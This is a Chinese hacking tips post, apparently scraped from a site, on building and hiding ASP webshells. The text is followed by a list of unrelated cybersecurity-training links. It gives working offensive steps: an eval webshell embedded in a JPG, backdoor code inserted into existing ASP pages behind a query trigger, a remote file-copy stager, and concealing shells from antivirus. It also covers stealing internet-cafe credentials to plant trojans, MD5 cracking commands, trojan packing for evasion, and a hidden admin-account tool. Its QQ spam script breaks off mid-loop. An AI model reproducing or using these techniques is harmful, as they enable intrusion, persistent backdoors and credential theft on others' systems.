菜鸟是如何变成ASP木马高手的!
1.名称如何制作图片ASP木马
建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->
找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'') </SCRIPT>
2. 名称整蛊网吧
先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开tel,连接,开共享,
复制一个木马过去运行即可。
3.名称感受MD5暴力破解的魅力
rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"
1和7代表密码最小和最大长度
阿汀我再加个方法http://md5.rednoize./ 在线破解
或者到http://.md5lookup./?category=01-3&searck=on
4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳的时候最好多选择不知名的加壳软件
5.名称隐蔽的插入型ASP木马
(1)在我们要做手脚的asp文件里加入如下内容
<%if request("action")="ok" then%>
shell代码插在这里,最好是小马,还要加密一下
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可
(2)另一种方法,在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>
访问的时候在做手脚的asp文件后面加上?filer=XXX
XXX为你本地上传的一个路径如 c:ating123.asp
上传后在做手脚的asp的同文件夹中有ating,asp
(3)前提得到system权限,
进入网站目录下一层
mkdir s…
copy ating.asp s…/
这样杀毒软件找不到的
访问http://网站/s…/ating.asp即可
6. 工具http://hack520.tengyi./chaojiyonghu.rar,此工具在该电脑生成一个超级用户
用户名为hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的.
7.名称QQ群脚本攻击
打开qq对话诓,复制消息,然后
狼蚁网站SEO优化的内容保存为.vbs 文件,运行即可
Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻击脚本"
for i=1 to 20
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座